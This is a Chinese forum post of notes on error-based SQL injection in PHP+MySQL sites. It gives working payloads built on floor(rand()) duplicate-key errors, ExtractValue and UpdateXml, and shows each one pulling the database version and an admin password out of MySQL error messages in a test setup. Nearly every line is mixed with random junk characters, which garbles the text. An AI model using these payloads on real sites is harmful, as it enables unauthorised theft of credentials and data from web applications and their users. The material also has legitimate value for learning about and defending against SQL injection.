放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
) l( k" ?( _; {' b- B& {6 D实际测试环境:0 l0 J1 }8 y/ n5 s j6 D0 j
$ _& i9 G$ K7 E
7 e* B0 }9 G( E% N3 L r0 U* g4 Zmysql> show tables;
1 }) A6 F2 Z5 X. k+----------------+
0 c& S+ m$ G* ?" I| Tables_in_test |
V ] R4 i: D7 X7 `: ]+----------------+
) }& c* s4 i/ }; ^* Z" B% K- ^| admin |
4 O) ~, o1 n1 Q| article |
% J8 c% E3 g9 C4 S* X+----------------+
( j3 v: R" M \) N8 W. c 9 {% R' C( h* l4 {0 P) [7 Z
% R# A! K! e2 A: n
/ u, s# }+ F u; \* Zmysql> describe admin;% Y& t1 @% y( ^* F
+-------+------------------+------+-----+---------+----------------+, D, {- C2 S- o* g* k& U/ v
| Field | Type | Null | Key | Default | Extra |' i. i; }3 d" d5 a$ h& }
+-------+------------------+------+-----+---------+----------------+ O3 l! |" a3 p$ x6 L
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |# J5 b* M9 r% f: h2 V" `
| user | varchar(50) | NO | | NULL | |0 G$ \: T! B$ M
| pass | varchar(50) | NO | | NULL | |) B4 t, \( C' P, u) R
+-------+------------------+------+-----+---------+----------------+7 C6 ~2 L3 q$ ]1 J& @7 E# p( z1 j8 V
3 U5 g8 X' v5 x: m
8 z/ r5 F- E/ j2 T9 ^5 F # x! T; v, s$ k+ p0 f+ [
mysql> describe article;
$ z; b( D4 C9 Q4 U: [- o+---------+------------------+------+-----+---------+----------------++ P& k# j$ @/ a+ K& v" N' o5 F
| Field | Type | Null | Key | Default | Extra |
8 L! G) g+ m: ?6 _ y% w9 x+---------+------------------+------+-----+---------+----------------+
T; z# f; r8 z- a2 E( r1 S( W| id | int(10) unsigned | NO | PRI | NULL | auto_increment |/ h! e( l0 N) n {3 _+ P
| title | varchar(50) | NO | | NULL | |/ Y5 I! A% y+ {% ]: c1 n
| content | varchar(50) | NO | | NULL | |( X X/ Y ]$ b1 \9 U; E& u' V4 U: C
+---------+------------------+------+-----+---------+----------------+' v* N( i. R8 x4 l
1、通过floor报错
8 M# ~9 u; v: R+ x$ v8 F可以通过如下一些利用代码5 B9 p9 i, k1 E, V8 c7 H% H
" V, \7 f7 z- d3 |8 `
4 R+ O# q7 m2 V1 U/ u4 E! k# H1 dand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
( p! j( _ V8 z: o/ E' P- x' Cfrom information_schema.tables group by x)a);
: @! x7 c8 Y* W " ^( x$ t5 j4 |" v5 q7 L
$ v& |; _, g2 S& t: f
and (select count(*) from (select 1 union select null union select !1)x
6 D+ \* x4 F$ l9 c! pgroup by concat((select table_name from information_schema.tables limit 1),
% s( O$ |+ @7 Z( m: ?- m8 p3 tfloor(rand(0)*2)));+ X( I0 K* W! L9 u0 T0 V
举例如下:
1 y# m/ P/ T8 [& e' n3 B首先进行正常查询:) E. O; t$ U& c) w1 D }
# Z; I" k, [* J( d0 o! T" x imysql> select * from article where id = 1;) h/ w" |7 T. g+ x7 M: B
+----+-------+---------+- Y( ~/ R+ Z* a/ c N0 y# k
| id | title | content |" p1 J. m3 P% g8 j5 x) P
+----+-------+---------+" R; v3 r* Y5 R! J
| 1 | test | do it |4 H) g8 c. X; m7 Q+ l4 p1 d1 G
+----+-------+---------+
; T2 K6 n1 K5 J假如id输入存在注入的话,可以通过如下语句进行报错。
" g' G6 v n, }# ?8 q/ W
, l/ V" p1 V( g, F( G% u0 m ; O" ~; v! D7 ?5 ?2 L1 B7 |4 S
mysql> select * from article where id = 1 and (select 1 from- ?3 h8 ^9 p$ K8 e
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
1 |# a( G5 q1 Q( NERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'6 z, i+ y: F! C- l$ Q1 \9 t+ \$ Y
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
- x% W+ @# E5 J# S. g3 y9 C% O- t例如我们需要查询管理员用户名和密码:
L4 p" A. J3 t& Q9 j- nMethod1:
" _8 l/ f: {) A: z4 k1 d+ B( e- M 4 {- R- E! P# ~# l6 S
+ s' A$ x2 `/ {1 v
mysql> select * from article where id = 1 and (select 1 from
9 F9 m W! a) P, U9 r(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
) z! T, ?4 h9 H( ^from information_schema.tables group by x)a);9 P# X; [0 O# ?$ g# U
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
1 R- R! U# J5 PMethod2:0 d$ l& L- v7 _0 S1 t
( M8 [6 Y& Q5 H0 K6 |5 K+ ]
; B/ l. Z' p8 m
mysql> select * from article where id = 1 and (select count(*)% O0 N9 z" u: N. \9 o
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
( {2 J, m' _' [' F; hfloor(rand(0)*2))); _; e9 A2 p' B K' K+ {6 w* U. \
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
- h' [2 l S0 D6 G2、ExtractValue
0 X8 A! w3 N+ n! j1 x% Y, i% X测试语句如下
" j$ {4 X5 t7 f3 E
+ Z4 K4 S: |4 ~4 A- ^ V" F
. F% H# m* R- C4 _1 U% kand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));; h. h* ]$ e m- ^7 }
实际测试过程8 ~5 U3 }1 d9 ~1 g: R) S
$ n( q1 h. g; d. ~& z
" z% o+ O% S5 e' X& x, H+ W" r- Zmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,9 D% e) }' v# p) t
(select pass from admin limit 1)));-- |- H9 ]9 T, t
ERROR 1105 (HY000): XPATH syntax error: '\admin888'. o. o, Z- ]2 |9 }; t% S! |5 I
3、UpdateXml ^! D8 @( V! y9 E- `, g; C) U
测试语句
6 M/ J* P0 u6 R; u* `2 ?
8 W# T) @* F) y1 U( t9 \ 5 Z% s M+ m% U3 a5 F: [
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)), \. x3 M- {4 K
实际测试过程
, F5 ?2 w: K9 W; m# U2 H8 P \ . k1 O# D! }$ m" a4 K
8 b, Z, u4 b% z# ~6 {0 mmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
+ r- w2 A' V+ O- T: w- r2 K7 l(select pass from admin limit 1),0x5e24),1));: g, i r( I: ?1 q; m! M& x3 U
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
1 H0 r7 H6 U8 \All, thanks foreign guys.
" j5 Z* V% F9 Y
3 j7 T j' Y0 V8 y6 o1 S+ J, ]! v( e+ |& y$ Z2 w$ h
|
发表于 2012-12-10 10:28:51
收藏
支持
反对